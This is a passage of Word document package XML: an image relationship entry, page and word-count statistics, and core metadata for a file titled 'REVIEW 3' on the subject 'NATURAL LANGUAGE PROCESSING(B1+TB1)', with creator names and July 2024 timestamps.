Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpeg"/><Relationship Id="rId177"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56</Pages>
  <Words>4352</Words>
  <Characters>24808</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>206</Lines>
  <Paragraphs>58</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>29102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 REVIEW 3</dc:title>
  <dc:subject>NATURAL LANGUAGE PROCESSING(B1+TB1)</dc:subject>
  <dc:creator>VAIBHAV BAKSHI</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Lakshjeet Pandit</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-11T13:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-11T13:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>